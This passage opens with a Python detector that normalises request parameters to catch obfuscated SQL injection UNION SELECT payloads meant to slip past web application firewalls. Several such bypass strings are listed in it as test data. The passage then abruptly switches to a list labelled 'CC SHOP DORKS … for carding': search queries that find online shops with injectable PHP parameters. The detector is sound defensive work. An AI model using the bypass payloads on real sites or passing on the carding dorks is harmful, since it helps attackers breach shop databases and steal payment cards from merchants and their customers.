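    "-15+(uNioN)+(sElECt)+1,2,3,4",                             # advanced 4: parentheses
    "-15+union (select 1,2,3,4)",                               # advanced 4: subquery form
    "null%0A/**//*!50000%55nIOn*//*yoyu*/all/**/%0A/*!%53eLEct*/%0A/*nnaa*/+1,2,3,4",  # WAF probe
]
# Constructed benign values that contain the keywords as ordinary text.
BENIGN = ["42", "credit union annual report", "select-all", "unionville"]

# The literal signature the tutorial's target firewall is assumed to use.
NAIVE_SIGNATURE = re.compile(r"UNION\s+SELECT")


def normalize(value: str) -> str:
    """Rewrite a parameter value into roughly what MySQL's parser will see."""
    # 1. URL-decode until stable ('+' is a space; this also catches double encoding).
    prev, s = None, value
    while s != prev:
        prev, s = s, unquote_plus(s)
    # 2. Versioned comments /*!50000 ... */ are executed by MySQL: keep the body,
    #    drop the opener. The trailing */ is removed in step 3.
    s = re.sub(r"/\*!\d*", " ", s)
    # 3. Ordinary comments, and any */ left over from step 2, act as whitespace.
    s = re.sub(r"/\*.*?\*/|\*/", " ", s, flags=re.S)
    # 4. Line comments (# ... and -- ...) run to end of line; the %0a trick relies on this.
    s = re.sub(r"(#|--)[^\n]*", " ", s)
    # 5. CR/LF/tabs are whitespace to the parser; fold case.
    return re.sub(r"\s+", " ", s).strip().lower()


KEYWORDS = re.compile(r"union|select", re.I)
UNION_SELECT = re.compile(r"\bunion\b[\s()]*(?:(?:all|distinct)\b[\s()]*)?\bselect\b")


def is_union_select(value: str) -> bool:
    """True if the value contains a UNION SELECT after normalisation.

    The loop re-checks after removing keyword occurrences, which is what a
    sanitising firewall does; that rewrite is how UNIunionON SELselectECT
    becomes UNION SELECT, so a detector has to anticipate it."""
    s = normalize(value)
    while True:
        if UNION_SELECT.search(s):
            return True
        stripped = KEYWORDS.sub("", s)
        if stripped == s:
            return False
        s = stripped


def missed_by_signature() -> list:
    """Bypasses that pass the literal signature but are caught after normalisation."""
    return [b for b in BYPASSES if not NAIVE_SIGNATURE.search(b) and is_union_select(b)]


if __name__ == "__main__":
    for b in BYPASSES:
        print(f"{is_union_select(b)!s:5}  {normalize(b)!r}")
    print("false positives:", [b for b in BENIGN if is_union_select(b)])
```

The order of the comment-handling steps matters: if ordinary comments were removed before the versioned-comment opener, `/*!50000UNION*/` would disappear entirely and the keyword with it, which is exactly the mistake the "comments" bypass exploits.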

Video Tutorial on WAF Bypassing:


NEW CC SHOP DORKS




These are dorks for carding
inurl:".php?cat="+intext:"Paypal"+site:UK
inurl:".php?cat="+intext:"/Buy Now/"+site:.net
inurl:".php?cid="+intext:"online+betting"


inurl:".php?id=" intext:"View cart"
inurl:".php?id=" intext:"Buy Now"
inurl:".php?id=" intext:"add to cart"
inurl:".php?id=" intext:"shopping"
inurl:".php?id=" intext:"boutique"
inurl:".php?id=" intext:"/store/"
inurl:".php?id=" intext:"/shop/"
inurl:".php?id=" intext:"toys"

inurl:".php?cid="
inurl:".php?cid=" intext:"shopping"
inurl:".php?cid=" intext:"add to cart"
inurl:".php?cid=" intext:"Buy Now"
inurl:".php?cid=" intext:"View cart"
inurl:".php?cid=" intext:"boutique"
inurl:".php?cid=" intext:"/store/"
inurl:".php?cid=" intext:"/shop/"
inurl:".php?cid=" intext:"Toys"

inurl:".php?cat="
inurl:".php?cat=" intext:"shopping"
inurl:".php?cat=" intext:"add to cart"
inurl:".php?cat=" intext:"Buy Now"
inurl:".php?cat=" intext:"View cart"
inurl:".php?cat=" intext:"boutique"
inurl:".php?cat=" intext:"/store/"
inurl:".php?cat=" intext:"/shop/"
inurl:".php?cat=" intext:"Toys"

inurl:".php?catid="
inurl:".php?catid=" intext:"View cart"
inurl:".php?catid=" intext:"Buy Now"
inurl:".php?catid=" intext:"add to cart"
inurl:".php?catid=" intext:"shopping"
inurl:".php?catid=" intext:"boutique"
inurl:".php?catid=" intext:"/store/"
inurl:".php?catid=" intext:"/shop/"
inurl:".php?catid=" intext:"Toys"